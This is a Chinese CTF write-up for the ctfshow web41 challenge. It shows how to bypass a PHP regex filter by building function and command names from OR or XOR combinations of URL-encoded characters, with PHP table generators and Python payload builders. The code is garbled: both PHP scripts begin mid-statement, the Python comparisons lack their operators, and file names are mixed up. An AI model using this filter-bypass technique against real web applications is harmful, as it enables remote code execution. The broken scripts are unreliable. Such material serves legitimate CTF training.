ctfshow中web入门第web41

ctfshow中web入门第web41

​​

留下了|运算绕过的方法那么直接利用脚本即可。

先用or运算的php脚本生成需要的规则文件(.txt文件)。如下图直接把需要绕过的正则替换成题目的正则就好：

​​

再用python脚本基于刚刚生成的txt文件跑出payload，如下图：

​​

结果中的分号需要去除。就ok了。

​​

利用代码：

//php或运算绕过脚本
=32&ord($c)<=126) {
                $contents=$contents.$c." ".$a." ".$b."\n";
            }
        }

    }
}
fwrite($myfile,$contents);
fclose($myfile);

//php异或绕过脚本
|\<|\%|\$/i'; //根据题目给的正则表达式修改即可
        if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
            echo "";
        }

        else{
            $a='%'.$hex_i;
            $b='%'.$hex_j;
            $c=(urldecode($a)^urldecode($b));
            if (ord($c)>=32&ord($c)<=126) {
                $contents=$contents.$c." ".$a." ".$b."\n";
            }
        }

    }
}
fwrite($myfile,$contents);
fclose($myfile);

//python或运算脚本
import requests
import urllib
from sys import *
import os


def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        f = open("res_xor.txt", "r")
        while True:
            t = f.readline()
            if t  "":
                break
            if t[0]  i:
                # print(i)
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = "(\"" + s1 + "\"|\"" + s2 + "\")"
    return (output)


while True:
    param = action(input("\n[+] your function：")) + action(input("[+] your command：")) + ";"
    print(param)

//python异或运算脚本
import requests
import urllib
from sys import *
import os


def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        f = open("res.txt", "r")
        while True:
            t = f.readline()
            if t  "":
                break
            if t[0]  i:
                # print(i)
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = "(\"" + s1 + "\"^\"" + s2 + "\")"
    return (output)


while True:
    param = action(input("\n[+] your function：")) + action(input("[+] your command：")) + ";"
    print(param)

‍